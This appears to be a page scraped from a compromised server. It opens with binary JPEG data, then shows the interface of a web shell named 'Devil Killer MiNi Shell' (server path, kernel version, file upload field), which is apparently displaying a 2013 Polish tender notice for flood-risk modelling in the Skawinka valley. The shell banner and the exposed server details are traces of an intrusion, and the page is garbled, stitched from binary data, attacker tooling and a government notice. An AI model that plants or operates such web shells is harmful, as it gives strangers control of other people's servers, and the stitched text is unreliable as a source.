JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /proc/self/root/proc/self/root/home/vmanager/www/common/web/tenders/20131004/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : //proc/self/root/proc/self/root/home/vmanager/www/common/web/tenders/20131004/205551-N-2013.html

<p class="kh_header"><b>Kraków: Opracowanie uzupełniające scenariuszy uwzględniające wykonanie obwałowań dla opracowania optymalnej metody zarządzania ryzykiem powodziowym w dolinie rzeki Skawinki</b><br>
<b>Numer ogłoszenia: 205551 - 2013; data zamieszczenia: 04.10.2013</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Małopolski Zarząd Melioracji i Urządzeń Wodnych Inspektorat Rejonowy w Krakowie , ul. Kraszewskiego 36, 30-110 Kraków, woj. małopolskie, tel. 12 628 09 80, faks 12 628 09 90.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.mzmiuw.krakow.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Opracowanie uzupełniające scenariuszy uwzględniające wykonanie obwałowań dla opracowania optymalnej metody zarządzania ryzykiem powodziowym w dolinie rzeki Skawinki.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> 1.Przedmiotem zamówienia jest wykonanie


OPRACOWANIE  POWINNO ZAWIERAĆ:

1.Uszczegółowienie lokalizacji nowych obwałowań( typu: mobilnego, ziemnych lub innych) poprzez wykonanie:
- analizy map terenów zalewowych w celu wytypowania obszarów zabudowanych znajdujących się w zasięgu strefy zalewowej Q1% pomimo redukcji fali wezbraniowej poprzez proponowane zbiorniki przeciwpowodziowe oraz przebudowę mostów.( dla wariantu  0 i wariantu 3
- analizy  map topograficznych i numerycznego modelu terenu (NMT) w celu ustalenia możliwej do realizacji lokalizacji planowanych obwałowań 
- opracowania warstwy przestrzennej  z proponowanymi odcinkami obwałowań i murów bulwarowych 
2. Przeprowadzenie modelowania hydraulicznego  poprzez: 
- implementację  do modeli hydraulicznych planowanych obiektów biernej ochrony przeciwpowodziowej ( obwałowania ,bulwary, systemy mobilne)
- wariantowe symulacje w celu określenia spiętrzenia wywołanego wprowadzeniem obwałowań oraz ustalenie ich długości i wysokości minimalnych ,
- wskazanie zalecanego typu obiektu dla określonej lokalizacji .
- analizę i interpretację wyników
3.Wyznaczenie zasięgów stref zalewowych poprzez:
- opracowanie numerycznego modelu powierzchni (NMPW) w oparciu o wyniki modelowania 
- przecięcie NMT i NMPW w celu uzyskania obwiedni strefy zalewowej zredukowanej   obwałowaniami.
- analizę i interpretację zasięgu uzyskanej strefy zalewowej
w przypadku uzyskania niezadowalających wyników przeprowadzenie ponownego modelowania oraz wyznaczenia strefy zalewowej 
   4. Szacowanie poszczególnych strat i analiza kosztów z uwzględnieniem wysokości zalanych nieruchomości obiektów zależnych od wysokości  wody w obiektach (0-0,5 m; 0,5 m-2 m; 2m - 4m; powyżej 4 m)poprzez
- określenie dla nowego scenariusza potencjalnych strat w odniesieniu do gmin i subzlewni w  oparciu o metodę BDOT
- określenie szacunkowych kosztów wykonania zaproponowanych obwałowań  
- analizę  kosztów i korzyści zaproponowanych rozwiązań . Porównanie wielkości strat dla stanu aktualnego ze scenariuszem uwzględniającym budowę zbiorników ,przebudowę mostów i wykonanie obwałowań. Porównanie różnic ( korzyści)z kosztami wykonania inwestycji.
5.  Wykonanie pomiarów geodezyjnych uzupełniających
6. Opracowanie raportu zawierającego:
- prezentację wyników oraz interpretację zaproponowanych rozwiązań ograniczających   zagrożenia  powodziowe w zlewni Skawinki za pomocą obwałowań i murów bulwarowych oraz zastosowanie wariantu nietechnicznego z  uwzględnieniem  danych otrzymanych od Samorządów Terytorialnych.
do przedmiotowego  raportu wymagane jest dołączenie zestawienia tabelarycznego wyników modelowania w którym zawarte będą:
wartości przepływów o określonym prawdopodobieństwie przewyższenia;
rzędne zwierciadeł wód odpowiadające poszczególnym przepływom wód  o określonym prawdopodobieństwie przewyższenia; rzędna dna w danym przekroju.
Km	Nazwa przepływu	Q	Poziom zw.wody
		(m3/s)	(m.n.p.m)
	Q10%		
	Q1%		
	Q0.2%		

Przedmiotowy raport wraz z kompletem przekrojów jw. należy wykonać w formie elektronicznej i papierowej.
W części elektronicznej zawierającej efekty prac wykonanych należy przekazać:
pliki w formacie .avi prezentujące rozwój wezbrania o określonym prawdopodobieństwie przewyższenia. Każdy z plików ma zawierać symulację dla jednego z prawdopodobieństw p=10%, p=1% oraz p=0,5%. (dla obszarów modelowania 2D)
skalibrowane i zweryfikowane modele hydrauliczne (zarówno jedno jak i dwuwymiarowy) z kompletem plików danych wejściowych i wyjściowych w formatach wymaganych przez Zlecającego, tj:
Model jednowymiarowy:
Sieć rzeczna: *.nwk11
Przekroje poprzeczne: *.xns11
Warunki brzegowe: *.bnd11
Parametry hydrodynamiczne: *.hd11
Serie czasowe: *.dfs0
Projekt: *.sim11
Wyniki: *.res11
Projekt: *.couple

Opracowanie należy  wykonać w konsultacji z  komisją koordynacyjną powołaną przez  zamawiającego:
	- RZGW
	- MZMiUW
	- Gminami i Powiatami położnymi na terenie zlewni
Wymagania dotyczące analizy: 
Do określenia zasięgu stref zagrożenia powodziowego należy opracować  model ruchu nieustalonego bazujący na pełnych jednowymiarowych równaniach Saint-Venanta: równaniu zachowania masy oraz równaniu zachowania energii. Model hydrauliczny należy przekazać w formacie umożliwiającym jego uruchomienie w oprogramowaniu MIKE 11 (w wersji 2011 lub wcześniejszej),. Wymóg zapisu wyników modelowania do formatu obsługiwanego przez program Mike11 wynika z konieczności zachowania jednakowych standardów tego typu opracowań, zgodnych ze środowiskiem informatycznym Regionalnego Zarządu Gospodarki Wodnej w Krakowie, którego głównym narzędziem w zakresie analiz hydraulicznych.

Ponadto analizę należy opracować w oparciu o między innymi:

- Ustawę z dnia 3 października 2008 r. o udostępnianiu informacji o środowisku i jego ochronie, udziale społeczeństwa w ochronie środowiska oraz o ocenach oddziaływania na środowisko (Dz. U. Nr 199 poz. 1227 z późn. zm.);
- Ustawę z dnia 21 sierpnia 1997 r. o gospodarce nieruchomościami (Dz.U. z 2010 r., Nr 102, poz. 651 z późn. zm);
- Rozporządzenie Ministra Spraw Wewnętrznych i Administracji z dnia 2 września 2004 r. w sprawie szczegółowego zakresu i formy dokumentacji projektowej, specyfikacji technicznych wykonania i odbioru robót budowlanych oraz programu funkcjonalno - użytkowego (Dz. U. Nr 202, poz. 2072); 
- Rozporządzenie Ministra Infrastruktury z dnia 23 czerwca 2003 r. w sprawie informacji dotyczącej bezpieczeństwa i ochrony zdrowia oraz planu bezpieczeństwa i ochrony zdrowia (Dz. U. Nr 120, poz. 1126);
- Ustawę z dnia 27 kwietnia 2001 r. Prawo Ochrony Środowiska (Dz. U. Nr 25, poz. 150 z późn. zm.); 
- Rozporządzenie Ministra Infrastruktury z dnia 18 maja 2004 r. w sprawie określenia metod i podstaw sporządzania kosztorysu inwestorskiego, obliczania planowanych kosztów prac projektowych oraz planowanych kosztów robót budowlanych określonych w programie funkcjonalno - użytkowym (Dz. U. Nr 130, poz. 1389);
- Ramowa Dyrektywa Wodna (Dyrektywa 2000/60/EC Rady Europy z dnia
23.10.2000 r.);
- Ustawa z dnia 16 kwietnia 2004 r. o ochronie przyrody (Dz. U. z 2013 r., poz. 627 z późn. zm.);
- Ustawa z dnia 18 lipca 2001 r. Prawo Wodne (Dz.U. z 2012 r., poz. 145 z późn. zm.);
- ustawą z dnia 8 lipca 2010 r. o szczególnych zasadach przygotowania do realizacji inwestycji w zakresie budowli przeciwpowodziowych (Dz.U. Nr 143, poz. 963 z późn. zm.); 
- Ustawa z dnia 7 lipca 1994 r. Prawo Budowlane (Dz.U. z 2010, Nr 243, poz. 1623 z późn. zm.)
- Ustawa z dnia 9 czerwca 2011 r. Prawo Geologiczne i Górnicze (Dz. U. Nr 163, poz. 981 z późn. zm.);
- Uchwała 251 IX2005 Rady Gospodarki Wodnej Regionu Wodnego Górnej Wisły z dnia 31.03.2005 r.
 
Przedmiot zamówienia należy wykonać w 10 egzemplarzach w wersji drukowanej  + wersja elektroniczna dokumentacji( dołączona do każdego egzemplarza drukowanego  zapisana na płycie CD DVD w formacie PDF (*pdf) z podziałem na oddzielne pliki dla każdego elementu dokumentacji.

7.Zamawiający wymaga, aby Wykonawca udzielił rękojmi na opracowaną   dokumentację  na okres 5 lat od daty odbioru prac .
projektową i pozostałe usługi projektowe na okres 5 lat od daty odbioru prac projektowych.
Wykonawca udzieli gwarancji jakości na wykonaną dokumentacje projektową na okres 5 lat od daty odbioru dokumentacji projektowej.</p>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 71.32.20.00-1.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 06.12.2013.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>


<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie określa szczegółowych wymagań w tym zakresie i sposobu oceny</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Warunek ten będzie spełniony przez Wykonawcę jeżeli wykażą ,że w okresie ostatnich trzech lat przed upływem terminu składania ofert , a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie , że wykonali co najmniej  2 opracowania  odpowiadające swoim rodzajem pracom stanowiącym przedmiot zamówienia o wartości nie mniejsza niż 50 tys. zł., 
Za prace odpowiadające swoim rodzajem Zamawiający uznaje prace w zakresie wykonania: studium, koncepcji i analiz w zakresie ochrony powodziowej opracowane na podstawie obliczeń hydrologicznych z podaniem ich wartości, przedmiotu, daty wykonania i podmiotów na rzecz których usługi zostały wykonane, oraz załączeniem dowodów ,czy zostały wykonane lub są wykonywane/świadczenia okresowe lub ciagłe/ należycie
Ocena spełnienia w.w.warunku na podstawie informacji zawartych w przedłożonych dokumentach.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie określa szczegółowych wymagań w tym zakresie i sposobu oceny</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Warunek ten będzie spełniony przez Wykonawce jeżeli   wykażą ,że dysponują lub będą dysponować osobami ,które będą uczestniczyć w wykonywaniu zamówienia wraz z informacjami na temat  ich  kwalifikacje zawodowych, doświadczenia i wykształcenia niezbędnych do wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami ,posiadające uprawnienia  konieczne do realizacji zamówienia w rozumieniu ustawy Prawo budowlane z dnia 7 lipca 1994 (tj. Dz. U. z 2010 r., Nr 243, poz. 1623 z późn. zm.) lub  odpowiadające im równoważne uprawnienia wydane na podstawie wcześniej obowiązujących przepisów lub odpowiednie kwalifikacje zawodowe uznane na zasadach określonych w przepisach odrębnych oraz ustawy z dnia 15 grudnia 2000 r. o samorządach zawodowych architektów, inżynierów budownictwa oraz urbanistów (Dz.U. z 2001 r. Nr 5,poz.42 z późn.zm.) składając oświadczenie ,że osoby te posiadają wymagane uprawnienia.
W szczególności:

Kierownik projektu- posiadający  10 lat doświadczenia w zakresie kierowania projektami z branży gospodarki wodnej
Główny ekspert w zakresie jednowymiarowego modelowania hydraulicznego  -   posiadający  5 lat doświadczenia w zakresie jednowymiarowego modelowania hydraulicznego;
Główny ekspert w zakresie hydrotechniki)- Osobę na stanowisku projektanta posiadającą uprawnienia o specjalności konstrukcyjno-budowlanej do projektowania w zakresie budowli melioracji wodnych lub budowli hydrotechnicznych, lub  odpowiadające im równoważne uprawnienia wydane na podstawie wcześniej obowiązujących przepisów lub odpowiednie kwalifikacje zawodowe uznane na zasadach określonych w przepisach odrębnych, składając stosowne oświadczenie legitymujący się 5 letnim  doświadczeniem w zakresie projektowania .
Główny ekspert w zakresie Systemu Informacji Przestrzennej (GIS) - legitymujący się 5 letnim  doświadczeniem w zakresie  sporządzania produktów GIS;
Główny ekspert w zakresie geodezji - posiadający uprawnienia zawodowe geodezyjne w zakresie  określonym w art. 43 pkt 1 ustawy z dnia 17 maja 1989r. Prawo geodezyjne i kartograficzne legitymujący się  5 letnim  doświadczeniem 
 specjalista w zakresie oceny oddziaływania na środowisko - legitymujący
się wykształceniem przyrodniczym oraz co najmniej 5 letnim doświadczeniem
w zakresie inwentaryzacji przyrodniczej i oceny oddziaływania inwestycji na
środowisko 
W przypadku wykonawców zagranicznych, zamawiający dopuścił równoważne kwalifikacje, zdobyte w innych państwach, na zasadach określonych w art. 12a ustawy z dnia 7 lipca 1994r. Prawo budowlane, z uwzględnieniem postanowień ustawy z dnia 18 marca 2008r. o zasadach uznawania kwalifikacji zawodowych nabytych w państwach członkowskich Unii Europejskiej (Dz. U. 2008, nr 63, poz. 394 ze zm.)
Ocena spełnienia w.w.warunku kwalifikacji  na podstawie informacji zawartych w przedłożonych dokumentach.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Warunek ten będzie spełniony przez Wykonawcę jeżeli złoży opłaconą polisę ,w przypadku jej braku inny dokument potwierdzający, że są ubezpieczeni od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem  zamówienia na wartość co najmniej 70 000 PLN (słownie: siedemdziesiąt tysięcy złotych 00/100) 
Ocena spełnienia w.w.warunku na podstawie informacji zawartych w przedłożonych dokumentach</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, głównych dostaw lub usług, w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wraz z podaniem ich wartości, przedmiotu, dat wykonania i podmiotów, na rzecz których dostawy lub usługi zostały wykonane, oraz załączeniem dowodów, czy zostały wykonane lub są wykonywane należycie;</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych do wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami;</li>

<li  style="margin-bottom: 12px;">oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień;</li>

<li  style="margin-bottom: 12px;">opłaconą polisę, a w przypadku jej braku, inny dokument potwierdzający, że wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia.</li>

</ul>
<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego naczelnika urzędu skarbowego potwierdzające, że wykonawca nie zalega z opłacaniem podatków, lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające, że wykonawca nie zalega z opłacaniem składek na ubezpieczenia zdrowotne i społeczne, lub potwierdzenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu -  wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul><p><b>III.6) INNE DOKUMENTY</b></p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>1.Wypełniony Formularz Oferty 2. Zaakceptowany projekt umowy 3. Dokument ustanawiający Pełnomocnika do reprezentowania Wykonawców wspólnie ubiegających się o udzielenie niniejszego zamówienia albo reprezentowania w postępowaniu i zawarcia umowy w sprawie niniejszego zamówienia publicznego - w przypadku, gdy Wykonawcy składają wspólną ofertę, 4. Stosowne pełnomocnictwo(a) potwierdzające, że dana osoba nie wymieniona w dokumencie rejestracyjnym prowadzonej działalności jest upoważniona do reprezentowania wykonawcy w postępowaniu. 5.Oświadczenie zgodnie z art. 44 o spełnieniu warunków udziału w postępowaniu, o których mowa w art. 22 ust. 1. 6.Oświadczenie , że nie podlega wykluczeniu na podstawie przesłanek zawartych w art 24 ust 1-2 7. Pisemne zobowiązanie innych podmiotów do oddania Wykonawcy do dyspozycji niezbędnych zasobów na okres korzystania z nich przy wykonywaniu zamówienia w sytuacji polegania przez Wykonawcę na wiedzy i doświadczeniu, osobach zdolnych do wykonania zamówienia lub zdolnościach finansowych innych podmiotów 7.1. oświadczenie o braku podstaw do wykluczenia z postępowania z powodu nie spełniania warunków, o których mowa w art. 24 ust. 1 Ustawy, zgodnie z drukiem stanowiącym załącznik do SIWZ; 7.2.dla weryfikacji osoby (reprezentacji) podpisującej zobowiązanie aktualny odpis z właściwego rejestru lub centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji,wystawionego nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert. 8. W przypadku osób fizycznych oświadczenie, że wyrażają zgodę na uczestnictwo w realizacji przedmiotu zamówienia po stronie Wykonawcy.</p>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b></p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>1. Wszelkie zmiany treści niniejszej umowy, wymagają aneksu sporządzonego z zachowaniem formy pisemnej pod rygorem nieważności.
2. Z zastrzeżeniem formy przewidzianej w ust. 1, Strony dopuszczają możliwość zmiany treści umowy w następujących przypadkach:
a) wystąpienie konieczności zmiany terminu wykonania przedmiotu umowy;
b) zmiany kluczowego personelu wykonawcy, zamawiającego lub podwykonawcy, w wypadku wystąpienia okoliczności uniemożliwiających dalsze pełnienie tych funkcji;
c) zmiany w KRS lub wpisie do ewidencji działalności gospodarczej w trakcie realizacji zamówienia, dotyczące Wykonawcy;
d) zmiany kont bankowych;
e) wystąpienia oczywistych omyłek pisarskich i rachunkowych w treści umowy;
f) zmiany obowiązujących przepisów dotyczących przedmiotu umowy.
3. Każda zmiana terminów wykonania przedmiotu zamówienia, będzie możliwa wyłącznie w przypadku wystąpienia okoliczności niezależnych od Wykonawcy i udokumentowanych w formie pisemnej, a mających wpływ na terminy realizacji przedmiotu umowy i przedstawionych przez Wykonawcę, co najmniej 7 dni przed upływem terminu umownego. 
4. Wynagrodzenie za wykonanie przedmiotu umowy jest wynagrodzeniem ryczałtowym i nie ulega zmianie za wyjątkiem stawki podatku VAT, która następuje z mocy prawa.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.mzmiuw.krakow.pl<br>
